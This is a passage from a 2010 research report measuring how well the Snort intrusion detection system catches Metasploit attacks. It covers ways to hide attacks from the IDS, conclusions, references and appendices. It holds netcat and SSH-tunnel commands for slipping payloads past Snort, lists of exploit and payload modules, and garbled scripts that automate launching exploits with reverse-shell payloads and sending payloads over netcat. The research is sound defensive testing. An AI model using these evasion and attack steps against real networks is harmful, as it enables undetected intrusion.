By using an attack over an encrypted channel the attack can be undetected bythe IDS. An encrypted channel can be used to bypass the IDS. Since encryptionencrypts the entire data stream, it is impossible for an IDS to read the contentof the encrypted data stream. Basically, Snort is unable to verify the signaturewithin the encrypted data stream.

On the target machine a netcat session is started that will send out thepayload via netcat. This is done in the same way as it was done in section 2.3.1only the other way around. The following command will send the binary outputwhen a server connects to port 1234:

ruby payload.rb | nc -l 1234

On the servers where Snort is running there is a connection initiated via assh tunnel to the sending server:

ssh -f -L 23333:127.0.0.1:1234 root@145.100.*.* sleep 10; \nc 127.0.0.1 23333 > payload.rb

So basically what this command does is:

1. Start SSH tunnel

2. Tunnel traffic on 127.0.0.1 port 1234 to the remote destination

3. Connect to the listening socket on the sending server through the SSHtunnel

4. Download the payload in binary format through this SSH tunnel

The above resulted in a detected payload being completely of the rader.Exploiting a machine via SSH and executing the payload via SSH is however adifferent story which is out of the scope of this research.

Kevin de KokNiek Timmers

May 30, 2010

5 HIDING ATTACKS 22

5.3 Fragmented Packets

Fragmenting packets has almost no influence on Snort. However if it is possibleto fragment the packets in such a way it will brake the signature defined by theconfigured rule set thereby hiding the attack. If this is feasible for the exploitsfound in Metasploit without rendering the exploit non-working is out of thescope of this research. But the fact that the signature detection can easily bebroken by fragmenting the packets is a dangerous and feasible issue.

5.4 Timing Attacks

An attacker could hide itself by timing its attacks in a certain way. However thishas almost no influence on the efficiency of Snort because it operates based onsignature detection. A situation where timing could work is to time an attackwhen Snort is overloaded thereby dropping packets.

5.5 Slow Down Attack

Slowing down an attack has no influence on Snort. Actually it becomes easierfor Snort to detect an attack because it has more time to process the packets.

5.6 Overloading Snort

Snort will drop packets if it is too busy. Thereby an attacker could launch andenial of service on a Snort installation just by sending it a lot of fake exploitsand other malicious traffic. It would be possible to hide its own attack betweenall these fake attacks. It will masquerade its own attack possibly very effectively.The attacker need to have access however to a botnet to accomplish this. Butacquiring a botnet is not difficult or expensive these days[18].

Kevin de KokNiek Timmers

May 30, 2010

6 CONCLUSION 23

6 Conclusion

During our research we have collected lots of results of which most are not reallysurprising. Before starting this project we already knew that Snort would notbe really effective against Metasploit attacks. However that Snort is not able todetect attacks which are heavily used by all kind of worms is really surprising.The three installation of Snort were all not able to detect the exploits used bythe Slammer[13] and Conficker[14] worm. Keeping in mind that Metasploit isreally easy to use, publicly available and almost not detectable with a normalinstallation of Snort, will make the framework a real danger to consumer andenterprise networks.

6.1 Effectiveness

The main question was of course what the effectiveness of Snort would be againstMetasploit attacks, configured with open source rule sets. The results are kindof horrible if you would think Snort would be doing a great job in detectingattacks in your network. Even with the Emerging Threats rule set only one outof five attacks is detected which is only 20%. Surprising is however that theversion of Snort in the repositories, which is an old version, is doing a betterjob than a newer version of Snort. The difference lies in the fact that the versionfrom the Ubuntu 8.04 repository has community rules which cannot be foundin the official Snort version. The weight of all these attacks is maybe not thesame, but all attacks, even the denial of service attacks could result indirectlylead to a compromised system.

6.2 Increase Effectiveness

The detection within Snort is done based on small signatures. This means ifthe attacker is able to change this signature in any way it will possible to hidethe attack for Snort. In order to create an intrusion detection system whichis more efficient detection should be done in a different way. A more efficientintrusion detection system would detect attacks not based on signatures but onbehaviour.[15]

6.3 Training Snort

The number of rules found in a Snort installation does not really resembles theeffectiveness of it in a specific network. If a company would use Snort it shouldtrain it accordingly to the network. Only apply rules against attacks that areexpected on the network, don’t implement thousands of rules against Linuxhosts if the network only consists of Windows hosts. The idea is to have a Snortinstallation as few rules as possible. Also collect all the port number over whichexpected traffic would be send, because than it is possible to write simple ruleswhich detect traffic on other ports which would always be malicious. TrainingSnort could very well result in a very effective intrusion detection system.

Kevin de KokNiek Timmers

May 30, 2010

6 CONCLUSION 24

6.4 Unique Attacks

A standard installation of Snort is mostly effective to well known attacks. Es-pecially the rules are based upon signature detection. If no known signature isavailable in the packet than Snort will not ring a bell. So if an attacker woulduse its own attacks which are not publicly available it renders the protectionfrom Snort useless. Thereby Snort cannot protect a network by itself but itjust another brick on top of the security measures taken to protect a networkagainst malicious activities.

6.5 Cat and Mouse

Attacks against software and operating systems will come out regularly. Therebyit is very important to keep your Snort rule set up to date. There will always bea window of opportunity for an attacker between the date the attack is releasedand the rule set of Snort is updated. This will result in an ongoing cat andmouse game between Snort and the attacks.

6.6 Obfuscating

Exploits are usually only effective for a short period of time if all systems will bepatched regularly. The only attacks within Metasploit which keep their valueover time are the payloads. Usually payloads are used over and over againwith different exploits. Thereby it is really important that those payloads aredetected efficiently. However it is really easy to hide these common payloadsby obfuscating them with a encoder. Especially the Shikata ga nai encoder isreally effective in obfuscating the payload.

Kevin de KokNiek Timmers

May 30, 2010

7 FUTURE WORK 25

7 Future work

For this research we had limited time. If we would have had more time it waspossible for use to conduct this research more thoroughly. Some mistakes weremade in the beginning that costs use some time. For example we were not awarethat Snort would totally not scan packets that were having a wrong checksum.Most of the traces we analysed with Snort had a bad checksum because theywere made on a different server and network. Therefore we had to re-do somefield work in order to get to our results.

7.1 Metasploit Rule Set

It would be nice if there was a Snort rule set which has a rule for every attack inMetasploit. The best thing would be if this rule set would be updated parallelwith Metasploit. It would be possible to say if you would have install Snortwith this rule set that Metasploit activity will always be detected.

7.2 Clean Packet Traces

The packet traces we have contain the attacks from Metasploit. But it would benice to have a clean packet traces with no additional data about our IP addressesso administrators could use these traces to test their intrusion detection system.The traces we have now contain public IP addresses, we cannot afford it torelease these traces. If we would make these traces on a local network we couldpublish them on the Internet for others to use.

7.3 Effect of Rule Parameters

During our research we have not looked specifically to the rule parameters.What is the influence of using these parameters on both efficiency and perfor-mance. Especially if you would run Snort in intrusion protection system modethe performance need to be perfect. If the Snort server cannot cope with theamount of packets that needs to be analysed under a intensive rule set it willdrop packets.

Kevin de KokNiek Timmers

May 30, 2010

REFERENCES 26

References

[1] Snorthttp://www.snort.org/Retrieved on 13th of April 2010

[2] Metasploithttp://www.metasploit.com/Retrieved on 13th of April 2010

[3] Emerging Threatshttp://www.emergingthreats.net/Retrieved on 13th of April 2010

[4] Sourcefirehttp://www.sourcefire.com/Retrieved on 13th of April 2010

[5] Obfuscated codehttp://en.wikipedia.org/wiki/Obfuscated_codeRetrieved on 20th of April 2010

[6] On the Infeasibility of Modeling Polymorphic Shellcode, Song et al, 2007Retrieved on 3th of May 2010

[7] Antivirus bypasshttp://www.offensive-security.com/metasploit-unleashed/Antivirus-BypassRetrieved on 7th of May 2010

[8] Payload generatorhttp://www.offensive-security.com/metasploit-unleashed/Payload-GeneratorRetrieved on 3th of May 2010

[9] Context keyed payload encodinghttp://druid.caughq.org/presentations/Context-keyed-Payload-Encoding.pdfRetrieved on 3th of May 2010

[10] Penetration testinghttp://en.wikipedia.org/wiki/Penetration_testRetrieved on 28th of May 2010

[11] Intrusion Detection Systemhttp://en.wikipedia.org/wiki/Intrusion_detection_systemRetrieved on 28th of May 2010

[12] farpd - ARP reply daemonhttp://www.digipedia.pl/man/doc/view/farpd.8/Retrieved on 3th of May 2010

Kevin de KokNiek Timmers

May 30, 2010

REFERENCES 27

[13] SQL Slammer Wormhttp://en.wikipedia.org/wiki/SQL_SlammerRetrieved on 29th of May 2010

[14] Conficker Wormhttp://en.wikipedia.org/wiki/ConfickerRetrieved on 29th of May 2010

[15] Intrusion Detection FAQ: What is behavior-based intrusion detection?http://www.sans.org/security-resources/idfaq/behavior_based.phpRetrieved on 29th of May 2010

[16] Alphanumeric and unicode encoders are generally unusablehttp://www.metasploit.com/redmine/issues/430Retrieved on 29th of May 2010

[17] NOPhttp://en.wikipedia.org/wiki/NOPRetrieved on 29th of May 2010

[18] Botnet even duur als bioscoopkaartjehttp://security.nl/artikel/33429/1/Botnet_even_duur_als_bioscoopkaartje.htmlRetrieved on 29th of May 2010

Kevin de KokNiek Timmers

May 30, 2010

A EXPLOITS - TOTAL: 266 28

A Exploits - Total: 266

symantec_iaosymantec_rtvscantrendmicro_serverprotecttrendmicro_serverprotect_createbindingtrendmicro_serverprotect_earthagenttype77energizer_duo_payloadname_serviceremote_agentca_arcserve_342discovery_tcpdiscovery_udpetrust_itm_alerthsmserverlgserverlgserver_rxrloginlgserver_rxsuselicenseinilicense_gcrmediasrv_sunrpcmessage_enginemessage_engine_heapsql_agenttape_engineuniversal_agentms03_026_dcomms05_017_msmqmsdns_zonenamebroadcom_wifi_ssidalphastor_agentblackice_pam_icqkerio_auth3cdaemon_ftp_usercesarftp_mkddreamftp_formateasyfilesharing_passeasyftp_cwd_fixretfilecopa_list_overflowfreeftpd_userglobalscapeftp_inputhttpdx_tolog_formatleapftp_pasv_replymicrosoft_ftpd_nlstnetterm_netftpd_user

oracle9i_xdb_ftp_passoracle9i_xdb_ftp_unlockproftp_bannersami_ftpd_usersasser_ftpd_portservu_mdtmslimftpd_list_concattrellian_client_pasvvermillion_ftpd_portwarftpd_165_passwarftpd_165_userwftpd_sizewsftp_server_503_mkdwsftp_server_505_xmd5mohaa_getinforacer_503beta5ut2004_secureadobe_robohelper_authbypassaltn_securitygatewayapache_chunkedapache_mod_rewrite_ldapapache_modjk_overflowbadblue_ext_overflowbadblue_passthrubea_weblogic_jsessionidbea_weblogic_transfer_encodingbelkin_bulldogca_igateway_debugedirectory_hostedirectory_imonitorefs_easychatserver_usernamefdm_auth_headerhp_nnm_openview5hp_nnm_ovalarm_langhp_nnm_ovashp_nnm_ovwebhelphp_nnm_snmphp_nnm_toolbarhp_power_manager_loginhttpdx_handlepeerhttpdx_tolog_formatia_webmailibm_tpmfosd_overflow

Kevin de KokNiek Timmers

May 30, 2010

A EXPLOITS - TOTAL: 266 29

ibm_tsm_cad_headericecast_headerintersystems_cacheipswitch_wug_maincfgretmailenable_auth_headermaxdb_webdbm_databasemaxdb_webdbm_get_overflowmcafee_epolicy_sourcemdaemon_worldclient_form2rawminishare_get_overflownavicopa_get_overflownovell_messenger_acceptlangoracle9i_xdb_passpeercast_urlprivatewire_gatewaypsoproxy91_overflowsambar6_search_resultssapdb_webtoolssavant_31_overflowservu_session_cookieshoutcast_formatshttpd_poststeamcast_useragentsybase_easervertrackercam_phparg_overflowtrendmicro_officescanxitami_if_mod_sinceiis_webdav_upload_aspms01_023_printerms01_033_idqms02_018_htrms03_007_ntdll_webdaveudora_listimail_deleteipswitch_searchmailenable_loginmailenable_statusmailenable_w3c_selectmdaemon_cram_md5mdaemon_fetchmercur_imap_select_overflowmercur_loginmercury_loginmercury_renamenovell_netmail_appendnovell_netmail_auth

novell_netmail_statusnovell_netmail_subscribefp30reg_chunkedms00_094_pbservernsiislog_postrsa_webagent_redirectw3who_queryimail_thccalicclnt_getconfigcalicserv_getconfigsentinel_lm7_udpdomino_http_accept_languagedomino_sametime_stmuxhummingbird_exceedniprintsaplpdwincomlpd_adminapple_quicktime_rtsp_responseasus_dpcproxy_overflowbakbone_netvault_heapbigant_serverbigant_server_250bigant_server_usvbomberclone_overflowbopup_commborland_interbaseborland_starteamdoubletakeeiqnetworks_esaeiqnetworks_esa_topologyfb_isc_attach_databasefb_isc_create_databasefb_svc_attachhp_omniinet_1hp_omniinet_2hp_ovtraceib_isc_attach_databaseib_isc_create_databaseib_svc_attachibm_tsm_cad_pingibm_tsm_rca_dicugetidentifylandesk_aolnsrvrmercury_phonebookmirc_privmsg_servernettransportsap_2005_license

Kevin de KokNiek Timmers

May 30, 2010

B PAYLOADS - TOTAL: 101 30

shixxnote_fonttalkative_responsetiny_identd_overflowvideolan_tivowindows_rshms10_025_wmss_connect_funneltimbuktu_fileuploadlyris_listmanager_weak_passms02_039_slammerms02_056_helloms09_004_sp_replwritetovarbinmssql_payloadmysql_yassl_helloxlink_nfsdms05_030_nntpnmap_storzenworks_desktop_agentosb_ndmp_authtns_argumentstns_auth_sesskeytns_service_nameseattlelab_passbluecoat_winproxy_hostccproxy_telnet_pingproxypro_http_getqbik_wingate_wwwproxyrealwinaim_triton_cseqsipxezphone_cseqsipxphone_cseqms03_049_netapims04_007_killbillms04_011_lsassms04_031_netdde

ms05_039_pnpms06_025_rasmans_regms06_025_rrasms06_040_netapims06_066_nwapims06_066_nwwksms06_070_wkssvcms08_067_netapims09_050_smb2_negotiate_func_indexmsdns_zonenamenetidentity_xtierrpcpipepsexecsmb_relaytimbuktu_plughntcommand_bofmailcarrier_smtp_ehlomercury_cram_md5ms03_046_exchange2000_xexch50wmailserverypops_overflow1freeftpd_key_exchangefreesshd_key_exchangesecurecrt_ssh1gamsoft_telsrv_usernamegoodtech_telnetattftp_long_filenamedlink_long_filenamefuturesoft_transfermodequick_tftp_pro_modetftpd32_long_filenamethreectftpsvc_long_modecam_log_securitywinvnc_http_getsafenet_ike_11ms04_045_wins

B Payloads - Total: 101

x64.shell.bind_tcpvncinject.reverse_tcp_allportsvncinject.reverse_ord_tcpvncinject.find_tagpatchupvncinject.reverse_tcp_allportspatchupmeterpreter.reverse_ipv6_tcpmeterpreter.reverse_ipv6_tcp

execvncinject.reverse_tcpshell_bind_tcpshell.reverse_tcpshell.reverse_httpshell.bind_tcpshell.bind_nonx_tcp

Kevin de KokNiek Timmers

May 30, 2010

C SCANNERS - TOTAL: 96 31

patchupvncinject.reverse_tcppatchupvncinject.bind_tcppatchupvncinject.bind_ipv6_tcppatchupmeterpreter.reverse_tcp_allportspatchupmeterpreter.find_tagmeterpreter.reverse_tcpmeterpreter.reverse_nonx_tcpmeterpreter.reverse_httpmeterpreter.bind_tcpvncinject.reverse_nonx_tcpvncinject.bind_tcpvncinject.bind_ipv6_tcpshell_bind_tcp_xpfwshell.reverse_nonx_tcpshell.find_tagshell.bind_ipv6_tcppatchupvncinject.reverse_tcp_dnspatchupvncinject.reverse_nonx_tcppatchupmeterpreter.reverse_tcp_dnspatchupmeterpreter.reverse_ord_tcppatchupmeterpreter.reverse_nonx_tcppatchupmeterpreter.bind_tcpmeterpreter.reverse_ord_tcpaddusermeterpreter.find_tagx64.shell_reverse_tcpx64.meterpreter.bind_tcpshell_reverse_tcpmeterpreter.reverse_tcp_dnsmeterpreter.reverse_httpsmeterpreter.bind_ipv6_tcpx64.vncinject.bind_tcpx64.shell_bind_tcp

x64.meterpreter.reverse_tcpx64.execvncinject.reverse_ipv6_tcpvncinject.bind_nonx_tcpshell.reverse_tcp_dnsshell.reverse_tcp_allportsshell.reverse_ord_tcpshell.reverse_ipv6_tcppatchupvncinject.reverse_ord_tcppatchupvncinject.reverse_ipv6_tcppatchupvncinject.bind_nonx_tcppatchupmeterpreter.reverse_tcppatchupmeterpreter.bind_nonx_tcppatchupmeterpreter.bind_ipv6_tcpmeterpreter.reverse_tcp_allportsmeterpreter.bind_nonx_tcpx64.shell.reverse_tcpvncinject.reverse_tcp_dnsvncinject.reverse_httppatchupvncinject.find_tagdownload_execx64.vncinject.reverse_tcpupexec.reverse_nonx_tcpupexec.reverse_tcp_allportsupexec.reverse_tcpupexec.reverse_ord_tcpupexec.reverse_ipv6_tcpupexec.reverse_httpupexec.find_tagupexec.bind_tcpupexec.bind_nonx_tcpupexec.bind_ipv6_tcpupexec.reverse_tcp_dns

C Scanners - Total: 96

backdoor.energizer_duo_detectdb2.db2_authdb2.db2_versiondb2.discoverydcerpc.endpoint_mapperdcerpc.hiddendcerpc.managementdcerpc.tcp_dcerpc_auditor

dect.call_scannerdect.station_scannerdiscovery.arp_sweepdiscovery.udp_sweepemc.alphastor_devicemanageremc.alphastor_librarymanagerfinger.finger_usersftp.anonymous

Kevin de KokNiek Timmers

May 30, 2010

C SCANNERS - TOTAL: 96 32

ftp.ftp_versionhttp.backup_filehttp.blind_sql_queryhttp.brute_dirshttp.certhttp.copy_of_filehttp.dir_listinghttp.dir_scannerhttp.dir_webdav_unicode_bypasshttp.enum_delicioushttp.enum_waybackhttp.error_sql_injectionhttp.file_same_name_dirhttp.files_dirhttp.frontpage_loginhttp.http_loginhttp.http_versionhttp.lucky_punchhttp.ms09_020_webdav_unicode_bypasshttp.optionshttp.prev_dir_same_name_filehttp.replace_exthttp.robots_txthttp.soap_xmlhttp.sqlmaphttp.sslhttp.svn_scannerhttp.tomcat_mgr_loginhttp.trace_axdhttp.vhost_scannerhttp.vmware_server_dir_travhttp.web_vulndbhttp.webdav_internal_iphttp.webdav_scannerhttp.webdav_website_contenthttp.writablehttp.xpathimap.imap_versionip.ipidseqmisc.ib_service_mgr_infomisc.sunrpc_portmappermotorola.timbuktu_udpmssql.mssql_loginmssql.mssql_ping

mysql.mysql_loginmysql.mysql_versionnetbios.nbnamenfs.nfsmountntp.ntp_monlistoracle.emc_sidoracle.sid_enumoracle.spy_sidoracle.tnslsnr_versionoracle.xdb_sidoracle.xdb_sid_brutepop3.pop3_versionportscan.ackportscan.ftpbounceportscan.synportscan.tcpportscan.xmaspostgres.postgres_loginpostgres.postgres_versionrogue.rogue_recvrogue.rogue_sendsip.enumeratorsip.optionssmb.pipe_auditorsmb.pipe_dcerpc_auditorsmb.smb2smb.smb_enumsharessmb.smb_enumuserssmb.smb_loginsmb.smb_lookupsidsmb.smb_versionsmtp.smtp_versionsnmp.aix_versionsnmp.communityssh.ssh_loginssh.ssh_login_pubkeyssh.ssh_versiontelephony.wardialtelnet.telnet_logintelnet.telnet_versiontftp.tftpbrutevnc.vnc_none_authx11.open_x11

Kevin de KokNiek Timmers

May 30, 2010

F INSERT RULES.RB 33

D Denial of Service - Total: 37

ios_http_percentpercentnfsd_mount3com_superstack_switchapache_mod_isapidell_openmanage_postwebrick_regexavahi_portzeroms02_063_pptp_doslsa_addprivs_heaplsa_transnames_heapsendmail_prescancascade_deletesynfloodcts_rts_floodappian_bpmms09_065_eot_integerfilezilla_server_portguildftp_cwdlisttitan626_site

vicftps50_listwinftp230_nlstxmeasy560_nlstxmeasy570_nlstpi3web_isapinat_helperms05_047_pnpms06_035_mailslotms06_063_transms09_001_writems09_050_smb2_negotiate_pidhighms09_050_smb2_session_logoffms10_006_negotiate_response_looprras_vls_null_derefvista_negotiate_stopms06_019_exchangept360_writechunked

E Encoders - Total: 16

cmd/generic_shcmd/ifsgeneric/noneppc/longxorppc/longxor_tagsparc/ongxor_tagx64/xorx86/alpha_mixed

x86/alpha_upperx86/call4_dword_xorx86/countdownx86/fnstenv_movx86/jmp_call_additivex86/nonupperx86/shikata_ga_naix86/single_static_bit

F insert rules.rb

12 #!/ usr/bin/ruby −w3 r e qu i r e ”mysql”45 # s t r i p the parameter clean6 de f s t r i p i t ( input )7 opt ion =(/[a−z : ] ∗ [ ˆ ” ] ? / . match ( input ) )8 input = input . gsub ( ”#{option }” , ””)9 input = input . delete ” \ ; ”

10 input = input . delete ”\””11 input = input . d e l e t e ”\ ’ ”

Kevin de KokNiek Timmers

May 30, 2010

G INSERT ATTACKS.RB 34

12 re turn input13 end1415 # s t a r t main func t i on16 de f main ( )17 # database connect ion18 dbh = Mysql . r e a l c onne c t (” l o c a l h o s t ” , ” root ” , ”∗∗∗” , ” r u l e s ”)19 # read a l l r u l e s f i l e20 f i l e = F i l e . new(” a l l ” , ” r ”)21 # s t a r t the whi le loop which i s r e s p on s i b l e f o r adding the r u l e s in

the DB22 whi le ( l i n e = f i l e . g e t s )2324 # address v a r i a b l e s from ru l e s25 mystring = ”#{ l i n e }”26 mystring = mystring . s p l i t27 na l e r t = mystring [ 1 ]28 f add r e s s = mystring [ 2 ]29 f p o r t = mystring [ 3 ]30 r e l a t i o n = mystring [ 4 ]31 taddre s s = mystring [ 5 ]32 tpor t = mystring [ 6 ]33 l ength = mystring . l ength34 r e s t = mystring [ 7 . . l ength ] . j o i n (” ”)35 msg = (/msg : . ∗ ? ; / . match ( r e s t ) )36 msg = s t r i p i t (”#{msg}”)37 . . .38 rev = (/ rev : . ∗ ? ; / . match ( r e s t ) )39 rev = s t r i p i t (”#{ rev }”)4041 # in s e r t r u l e in DB42 dbh . query (”INSERT INTO ubuntu ( a l e r t , f rom address , from port ,

r e l a t i on , to addres s , to port , msg ,43 l ogto , minfrag , t t l , s id , ds i ze , content , o f f s e t , depth , f l a g s ,

seq , ack , i type , icode , s e s s i on ,44 c l a s s type , ur i content , r e f e r enc e , f low , rev )45 VALUES ( ’#{ na l e r t } ’ , ’#{ faddress } ’ , ’#{ f po r t } ’ , ’#{ r e l a t i on } ’ ,

’#{ taddress } ’ , ’#{ t por t } ’ , ’#{msg} ’ ,46 ’#{ l o g to } ’ , ’#{minfrag} ’ , ’#{ t t l } ’ , ’#{s i d } ’ , ’#{d s i z e } ’ , ’#{

content } ’ , ’#{o f f s e t } ’ , ’#{depth} ’ , ’#{ f l a g s } ’ ,47 ’#{seq} ’ , ’#{ack} ’ , ’#{ i t ype } ’ , ’#{i code } ’ , ’#{s e s s i o n } ’ , ’#{

c l a s s t yp e } ’ , ’#{ur i con t en t } ’ , ’#{r e f e r e n c e } ’ ,48 ’#{f low } ’ , ’#{rev} ’ ) ” )4950 end51 f i l e . c l o s e52 end5354 main ( )

G insert attacks.rb

1 #!/ usr/bin/ruby2 r e qu i r e ”mysql”34 # s ta r t main funct ion5 de f main ( )6 # in i t i a t e database connection7 dbh = Mysql . r e a l c onne c t ( ” 1 . 2 . 3 . 4 ” , ” root ” , ”∗∗∗∗∗∗” , ” r u l e s ” )89 # read at tack f i l e

10 f i l e = F i l e .new( ” a t tacks . c l ean ” , ” r ” )1112 # s ta r t whi le loop tha t i s r e spons i b l e for in s e r t i ng a t tacks

Kevin de KokNiek Timmers

May 30, 2010

H DUMP ATTACKS.RB 35

13 while ( l i n e = f i l e . g e t s )14 mystring = ”#{ l i n e }”15 mystring = mystring . s p l i t ( ’ : ’ )16 qua l i t y = mystring [ 1 ]17 de s c r i p t i o n = mystring [ 2 ] . s t r i p18 mystring = mystring [ 0 ] . s p l i t ( ’ / ’ )19 os = mystring [ 0 ]20 type = mystring [ 1 ]21 name = mystring [ 2 ]22 dbh . query ( ”INSERT INTO payloads ( os , type , name , qua l i ty ,

d e s c r i p t i o n )23 VALUES ( ’#{ os } ’ , ’#{ type } ’ , ’#{name} ’ , ’#{ qua l i t y } ’ , ’#{

de s c r i p t i o n } ’ ) ” )24 end25 f i l e . c l o s e26 end2728 main ( )

H dump attacks.rb

1 #!/ usr/bin/ruby2 r e qu i r e ”mysql”34 #s ta r t the a new method which holds the s c r i p t5 de f main ( )67 #def ine ruby binary8 ruby=”/opt/ metasp lo i t3 /bin /ruby”9

10 #def ine metasp lo i t c l i s c r i p t11 ms f c l i=”/opt/ metasp lo i t3 /msf3/ ms f c l i ”1213 #connect to database14 dbh = Mysql . r e a l c onne c t ( ” 1 . 2 . 3 . 4 ” , ” root ” , ”∗∗∗∗∗∗∗∗” , ” r u l e s ” )15 puts ” Server ve r s i on : ” + dbh . g e t s e r v e r i n f o1617 #se l e c t name, type , os , id from e xp l o i t s18 query = dbh . query ( ”SELECT name , type , os , id from exp l o i t s ; ” )1920 #loop through a l l e x p l o i t s and ass ign a l l va lues to a var i a b l e21 while row = query . f e t ch row do22 e xp l o i t=row [ 0 ]23 type=row [ 1 ]24 os=row [ 2 ]25 id=row [ 3 ]26 puts e x p l o i t s2728 #s ta r t tcpdump in background and s t a r t saving packets in a f i l e29 tcpdump = IO . popen ( ”tcpdump − i eth1 −w pcaps/#{ id }.#{ e xp l o i t } . pcap &” )3031 #s ta r t metasp lo i t from the command l i n e with a l l p o s s i b l e parameters32 command = IO . popen ( ”#{ruby} #{ms f c l i } e xp l o i t /#{os}/#{type}/#{ e xp l o i t }33 RHOST=172 .16 .0 .434 LHOST=172 .16 .0 .235 PXHOST=172 .16 .0 .436 TARGET=037 PAYLOAD=windows/ s h e l l / r e v e r s e t c p E” )3839 #read a l l l ines , t h i s makes sure output ge t s posted in terminal40 while ( l i n e = command . g e t s )4142 #i f l i n e containes ’ f a i l e d ’ save i t in a f i l e for debugging43 i f ( l i n e =˜ / ( .∗ ) f a i l e d ( . ∗ ) / )

Kevin de KokNiek Timmers

May 30, 2010

J TRANSFORM PAYLOADS.RB 36

44 myf i l e = F i l e . open ( ” f a i l e d ” , ”a” )45 myf i l e . puts ( ”#{id } −> #{e xp l o i t } −> #{ l i n e }” )46 myf i l e . c l o s e47 end48 pr in t l i n e49 end5051 #k i l l tcpdump52 x [ k i l l a l l tcpdump ]5354 end55 query . f r e e56 end5758 main ( )

I dump payloads.rb

1 de f main ( )2 # se t ruby 1.9 loca t ion ( f a s t e r than 1.8)3 ruby=’ /opt/ metasp lo i t3 /bin /ruby ’45 # se t metasp lo i t d i rec tory6 metasp lo i t=’ /opt/ metasp lo i t3 /msf3 ’78 # database connection and query9 dbh = Mysql . r e a l c onne c t ( ” 145 . 100 . 106 . 1 ” , ” root ” , ”∗∗∗” , ” r u l e s ” )

10 query = dbh . query ( ”SELECT id , name , type from payloads ” )1112 # whi le loop tha t i s r e spons i b l e for dumping a l l payloads13 while row = query . f e t ch row do14 id=row [ 0 ]15 name=row [ 1 ]16 type=row [ 2 ]17 puts ”#{name}”18 x [#{metasp lo i t }/msfpayload windows/#{type}/#{name}19 LHOST=145.100 .∗ .∗ y > d l l i n j e c t /#{ id }.#{ type}.#{name} . rb ]20 end21 end2223 main ( )

J transform payloads.rb

1 #!/ usr/bin/ruby2 r e qu i r e ’ f i nd ’34 # s ta r t funct ion to transform payloads to a executab l e format5 de f f i nd and p r i n t ( pattern )6 # find payloads in d i rec tory7 Find . f i nd ( ’ . ’ ) do | entry |8 # i f the f i l e i s a payload , transform i t9 i f F i l e . f i l e ?( entry ) and entry [ pattern ]

10 asd = entry . gsub (/\ .\ // , ””)11 bu f f e r = F i l e .new( asd , ’ r ’ ) . read . gsub (/=/ , ”+=” )12 asd = F i l e .new( ” . . / t e s t /#{asd}” , ’w ’ )13 asd . puts ”buf = ’ ’ ”14 asd . puts bu f f e r15 asd . puts ”puts buf ”16 asd . c l o s e

Kevin de KokNiek Timmers

May 30, 2010

L SNORT PARSE PCAP 37

17 end18 end19 end20 # look for f i l e s tha t end with . rb in current d i rec tory and transform21 f i nd and p r i n t (/ .+\ . rb\$ /)

K send payloads.rb

1 #!/ usr/bin/ruby2 r e qu i r e ‘ f i nd ’34 #new func t i on f o r sending a l l payloads5 de f send payloads ( pattern )67 #f ind f i l e s in cur rent d i r e c t o r y8 Find . f i nd ( ’ . ’ ) do | entry |9

10 #i f the f i l e i s a ruby f i l e do11 i f F i l e . f i l e ?( entry ) and entry [ pattern ]1213 #remove ’ id ’ from the f i l ename14 payload = entry . gsub (/\ .\// , ””)1516 #pr in t payload on termina l17 puts ”#{payload }”1819 #send paylaod v ia nc to t a r g e t host20 x [ ruby #{payload} | nc −w 5 t a r g e t i p port ]21 end22 end23 end2425 #c a l l send payload method26 send payloads (/ .+\ . rb\$ /)

L snort parse pcap

This script is used to parse pcap files with Snort and writing Alerts to thedatabase.

12 #!/ bin/bash3 mysql auth ( ) { / usr /bin /mysql −h <ip> −−user=root −−pass=∗∗∗ r u l e s4 }#Loop through pcap f i l e s5 for i in \$ ( l s pcaps/∗ . pcap )6 do #Parse pcap f i l e s and wri te de l im i t e r s7 e x p l o i t =‘echo $ i | sed ’ s /\ . pcap// ’ | sed ’ s/pcaps \/// ’ | sed ’ s

/ˆ[0−9]∗ .// ’ ‘8 echo ”B ”” $ e x p l o i t ” >> /var/ log / snort / a l e r t9 snort −A fa s t −c / etc / snort / snort . conf −r $ i &> pcaps/” $ e x p l o i t ””.

tmp”10 i f [ [ −x pcaps/” $ e x p l o i t ”. tmp ] ] ; then11 grep ALERT pcaps/” $ e x p l o i t ”. tmp | awk −F ” ” ’{ pr in t $2 } ’ >>

/var/ log / snort / a l e r t12 echo ‘ grep ALERT pcaps/” $ e x p l o i t ”. tmp | awk −F ” ” ’{ pr in t

$2 } ’ ‘13 f i14 echo ”E ” $ e x p l o i t >> /var/ log / snort / a l e r t15 #Parse l o g f i l e and wri te de tec t ion to the database

Kevin de KokNiek Timmers

May 30, 2010

M META-SNORT.SH 38

16 i f [ [ ‘ grep ALERT pcaps/” $ e x p l o i t ”. tmp | awk −F ” ” ’{ pr in t $2 } ’ ‘ −gt 0 ] ] ; then

17 count=”expr ‘ grep ALERT pcaps/” $ e x p l o i t ”. tmp | awk −F ” ” ’{pr in t $2 } ’ ‘ + 1”

18 echo ”update e x p l o i t s s e t ubuntu = ’” ‘ echo −ne ‘ $ ( t a i l −‘$count ‘/var/ log / snort / a l e r t | grep −E \ [0−9]:∗\ ] | awk −F ”:” ’{

pr in t $4 } ’) ” ’ where name = ’” $ e x p l o i t ” ’ ;”19 echo ”update e x p l o i t s s e t ubuntu = ’” ‘ echo −ne ‘ $ ( t a i l −‘$count ‘

/var/ log / snort / a l e r t | grep −E \ [0−9]:∗\ ] | awk −F ”:” ’{pr in t $4 } ’) ” ’ where name = ’” $ e x p l o i t ” ’ ;” | mysql auth

20 e l s e21 echo ”update e x p l o i t s s e t ubuntu = ’NOT DETECTED’ where name =

’” $ e x p l o i t ” ’ ;”22 echo ”update e x p l o i t s s e t ubuntu = ’NOT DETECTED’ where name =

’” $ e x p l o i t ” ’ ;” | mysql auth23 rm ” $ e x p l o i t ”. tmp &> /dev/ nu l l24 f i25 done$

M meta-snort.sh

1 #!/ bin/bash2 mysql\ auth ( ) { / usr /bin /mysql −h <ip> −−user=root −−pass=∗∗∗∗∗ r u l e s3 }45 #Display de tec t ion average on the screen6 function ubuntu {7 echo −e ’\E[ 47 ; 3 5m’ ” \033[1m###### Summary E f f e c t i v e n e s s o f Snort 2 . 7 . 0

######\033[0m”8 #Set vars with database in fo about payloads , t o ta l , de tec ted and avarage9 pto ta l =‘echo −en ” s e l e c t COUNT( ubuntu ) from payloads where ubuntu <>

’ ’ ; ” \10 mysql auth | sed ’ s /ˆC.∗ ) // ’ ‘11 pdetected=‘echo −en ” s e l e c t COUNT( ubuntu ) from payloads where ubuntu <>

